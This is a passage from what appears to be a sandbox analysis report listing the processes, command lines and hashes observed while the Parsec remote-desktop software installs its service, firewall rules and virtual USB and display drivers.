                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:12
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              Imagebase:0x400000
                              File size:4'056'240 bytes
                              MD5 hash:01EF58E7C144C701B2EA01CFC049DBE4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" control Parsec 200
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\taskkill.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
                              Imagebase:0xa90000
                              File size:74'240 bytes
                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:21:11:59
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" stop Parsec
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" delete Parsec
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:21:12:02
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:21:12:03
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:21:12:03
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:21:12:03
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:21:12:04
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:21:12:05
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
                              Imagebase:0x910000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:21:12:05
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:21:12:05
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\sc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\sc.exe" start Parsec
                              Imagebase:0xe00000
                              File size:61'440 bytes
                              MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:21:12:06
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec\pservice.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Parsec\pservice.exe"
                              Imagebase:0x7ff7ec020000
                              File size:418'696 bytes
                              MD5 hash:46CD3FC327AF9109BD143BA7F16DF397
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:false

                              Target ID:41
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
                              Imagebase:0xec0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\netsh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
                              Imagebase:0x1560000
                              File size:82'432 bytes
                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:43
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:45
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:46
                              Start time:21:12:07
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                              Imagebase:0x400000
                              File size:907'184 bytes
                              MD5 hash:2D009D446A0BA83EC2F12242F7ED126C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              Target ID:47
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:48
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:49
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                              Imagebase:0x7ff763c00000
                              File size:596'352 bytes
                              MD5 hash:DDDEE00430F7A3D52580B7C85D63D9DC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              Target ID:50
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
                              Imagebase:0x7ff798a10000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:51
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:52
                              Start time:21:12:08
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
                              Imagebase:0x7ff694b70000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              Target ID:53
                              Start time:21:12:09
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
                              Imagebase:0x7ff694b70000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:54
                              Start time:21:12:09
                              Start date:13/11/2024
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                              Imagebase:0x7ff6eef20000
                              File size:55'320 bytes
                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:55
                              Start time:21:12:09
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:56
                              Start time:21:12:11
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:57
                              Start time:21:12:12
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
                              Imagebase:0x7ff694b70000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:58
                              Start time:21:12:12
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:59
                              Start time:21:12:13
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:60
                              Start time:21:12:14
                              Start date:13/11/2024
                              Path:C:\Windows\System32\runonce.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\runonce.exe" -r
                              Imagebase:0x7ff701920000
                              File size:61'952 bytes
                              MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:61
                              Start time:21:12:14
                              Start date:13/11/2024
                              Path:C:\Windows\System32\grpconv.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\grpconv.exe" -o
                              Imagebase:0x7ff7ca320000
                              File size:52'736 bytes
                              MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:63
                              Start time:21:12:15
                              Start date:13/11/2024
                              Path:C:\Windows\System32\drvinst.exe
                              Wow64 process (32bit):false
                              Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default"
                              Imagebase:0x7ff67f0b0000
                              File size:337'920 bytes
                              MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:64
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:65
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:66
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                              Imagebase:0x400000
                              File size:517'256 bytes
                              MD5 hash:4B9A3048286692A865187013B70F44E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              Target ID:67
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\wevtutil.exe
                              Wow64 process (32bit):true
                              Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
                              Imagebase:0x970000
                              File size:208'384 bytes
                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:68
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:69
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\wevtutil.exe
                              Wow64 process (32bit):false
                              Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
                              Imagebase:0x7ff726270000
                              File size:278'016 bytes
                              MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:70
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:71
                              Start time:21:12:16
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:72
                              Start time:21:12:17
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:.\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
                              Imagebase:0x7ff6750a0000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Has exited:true

                              Target ID:73
                              Start time:21:12:17
                              Start date:13/11/2024
                              Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              Wow64 process (32bit):false
                              Commandline:.\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
                              Imagebase:0x7ff6750a0000
                              File size:588'160 bytes
                              MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
